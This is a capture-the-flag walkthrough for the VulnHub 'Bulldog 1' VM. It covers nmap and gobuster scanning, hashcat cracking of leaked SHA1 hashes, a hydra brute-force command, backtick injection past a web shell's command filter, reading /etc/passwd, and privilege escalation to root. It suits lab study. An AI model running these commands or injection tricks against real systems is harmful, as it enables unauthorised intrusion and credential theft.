This is the walk-through solution for the Capture the Flag (CTF) challenge called “Bulldog 1” from VulnHub.
Note: Please keep in mind that there are often many ways to successfully complete such challenge. This is only one of them. Other tools can be used to obtain the same result.
This CTF was done using VirtualBox and IP address was 10.0.2.15.
CTF Introduction
Bulldog Industries recently had its website defaced and owned by the malicious German Shepherd Hack Team. Could this mean there are more vulnerabilities to exploit? Why don't you find out? :) This is a standard Boot-to-Root. Your only goal is to get into the root directory and see the congratulatory message, how you do it is up to you! Difficulty: Beginner/Intermediate, if you get stuck, try to figure out all the different ways you can interact with the system. That's my only hint ;) Made by Nick Frichette (frichetten.com) Twitter: @frichette_n I'd highly recommend running this on Virtualbox, I had some issues getting it to work in VMware. Additionally DHCP is enabled so you shouldn't have any troubles getting it onto your network. It defaults to bridged mode, but feel free to change that if you like.
Scan with nmap
nmap -T4 -A -v 10.0.2.15 Output: ... PORT STATE SERVICE VERSION 23/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) ... 80/tcp open http WSGIServer 0.1 (Python 2.7.12) ... 8080/tcp open http WSGIServer 0.1 (Python 2.7.12)
The output shows that the ssh service is opened on port 23 (not standard 22). It also shows that a web server is running on port 80 and 8080.
Using nmap ssh scripts or http scripts didn’t help.
nmap -sV -p 23 --script=ssh* 10.0.2.15 # http scripts took too long... 2 or 3 hours nmap -sV -p 80 --script=http* 10.0.2.15 nmap -sV -p 8080 --script=http* 10.0.2.15
Access the website on port 80 or 8080
In a web browser, type 10.0.2.15:80 and 10.0.2.15:8080 in the URL address bar. Both sites look the same.
Scan website for hidden pages with gobuster
URL=10.0.2.15 WL=/usr/share/dirb/wordlists/common.txt gobuster -u $URL -w $WL -s '200,204,301,302,307,403,500' -e Output: ... http://10.0.2.15/admin (Status: 301) http://10.0.2.15/dev (Status: 301) http://10.0.2.15/robots.txt (Status: 200) ...
By visiting the hidden web pages found with gobuster, we learn that there is a Django admin panel on /admin. We also find password hashes hidden in the source code of web page /dev.
<!--Need these password hashes for testing. Django's default is too complex--> <!--We'll remove these in prod. It's not like a hacker can do anything with a hash--> Team Lead: alan@bulldogindustries.com<br> <!--6515229daf8dbdc8b89fed2e60f107433da5f2cb--> Back-up Team Lead: william@bulldogindustries.com<br><br> <!--38882f3b81f8f2bc47d9f3119155b05f954892fb--> Front End: malik@bulldogindustries.com<br> <!--c6f7e34d5d08ba4a40dd5627508ccb55b425e279--> Front End: kevin@bulldogindustries.com<br><br> <!--0e6ae9fe8af1cd4192865ac97ebf6bda414218a9--> Back End: ashley@bulldogindustries.com<br> <!--553d917a396414ab99785694afd51df3a8a8a3e0--> Back End: nick@bulldogindustries.com<br><br> <!--ddf45997a7e18a25ad5f5cf222da64814dd060d5--> Database: sarah@bulldogindustries.com<br> <!--d8b8dd5e7f000b8dea26ef8428caf38c04466b3e-->
Content of /robots.txt (converted from ascii art)
German Shepherd Hack Team You got owned
The /dev page also contains a link to a web shell at http://10.0.2.15/dev/shell/. The shell requires authentication.
Please authenticate with the server to use Web-Shell
Crack password hashes with Hashcat and “rockyou.txt” word list
Put hashes in a text file. Hash type is SHA1 (common, could have tried MD5 too).
HASH=/root/Documents/hash/hash.txt WL=/usr/share/wordlists/rockyou.txt hashcat -m 100 $HASH $WL --force hashcat -m 100 $HASH --show
We find:
- User: sarah, Password: bulldoglover
- User: nick, Password: bulldog
Log with this logging on http://10.0.2.15/admin, then go to http://10.0.2.15/dev/shell/
Log in Django admin panel
Go to the Django admin panel at http://10.0.2.15/admin and enter Sarah or Nick’s user credentials.
Access the Web-Shell
Now that we are authenticated with Django, go to the web-shell at http://10.0.2.15/dev/shell/.
Trying any command that is not in the list displayed, we get the error message below.
INVALID COMMAND. I CAUGHT YOU HACKER! or INVALID COMMAND. I CAUGHT YOU HACKER! ';' CAN BE USED TO EXECUTE MULTIPLE COMMANDS!!
After many tries, here is the interesting information I could get.
List of users
cat /etc/passwd # Only these users can log in: root sync bulldogadmin django
Note: Trying to crack the password of users that can log in with Hydra didn’t work.
USERS=/root/Documents/users.txt IP="10.0.2.15:23" WL=/usr/share/wordlists/rockyou.txt hydra -t 10 -V -f -L $USERS -P $WL ssh://$IP
Display the current user (bypass command limitation using ` character)
echo `whoami` Output: django
While browsing the home of users previously found (hidden files)
ls -la /home/bulldogadmin Output: ... drwxrwxr-x 2 bulldogadmin bulldogadmin 4096 Sep 21 00:44 .hiddenadmindirectory ...
Explore content of hidden directory
ls -la /home/bulldogadmin/.hiddenadmindirectory Output: .. -rw-r--r-- 1 bulldogadmin bulldogadmin 8728 Aug 26 03:18 customPermissionApp -rw-rw-r-- 1 bulldogadmin bulldogadmin 619 Sep 21 00:44 note ..
Read the hidden note
cat /home/bulldogadmin/.hiddenadmindirectory/note Output: Nick, I'm working on the backend permission stuff. Listen, it's super prototype but I think it's going to work out great. Literally run the app,give your account password, and it will determine if you should have access to that file or not! It's great stuff! Once I'm finished with it, a hacker wouldn't even be able to reverse it! Keep in mind that it's still a prototype right now. I am about to get it working with the Django user account. I'm not sure how I'll implement it for the others. Maybe the webserver is the only one who needs to have root access sometimes? Let me know what you think of it! -Ashley
Display content of customPermissionApp (cat command gives an error because it’s a binary file)
strings /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp Output (only the interesting part): ... SUPERultH imatePASH SWORDyouH CANTget ...
We found password “SUPERultimatePASSWORDyouCANTget”.
Copy customPermissionApp in django home directory since it cannot be executed by django while in bulldogadmin directory (bypass command limitation using ` character)
echo `cp /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp /home/django/`
Connect to the server using ssh and django user
ssh django@10.0.2.15 -p 23 Enter password: SUPERultimatePASSWORDyouCANTget
Elevate django privileges to root with customPermissionApp
# Grant execute on customPermissionApp to django chmod u+x /home/django/customPermissionApp django /home/django/customPermissionApp Enter password: SUPERultimatePASSWORDyouCANTget
You are root!!!
Congrats message
cd /root cat congrats.txt Output: Congratulations on completing this VM :D That wasn't so bad was it? Let me know what you thought on twitter, I'm @frichette_n As far as I know there are two ways to get root. Can you find the other one? Perhaps the sequel will be more challenging. Until next time, I hope you enjoyed!
Note: While exploring as root, you will find a hidden antivirus directory that might be exploitable.
cd / ls -la drwxr-xr-x 2 root root 4096 Aug 25 22:09 .hiddenAVDirectory cd .hiddenAVDirectory/ cat AVApplication.py Output: #!/usr/bin/env python # Just wanted to throw this placeholder here really quick. # We will put the full AV here when the vendor is done making it. # - Alan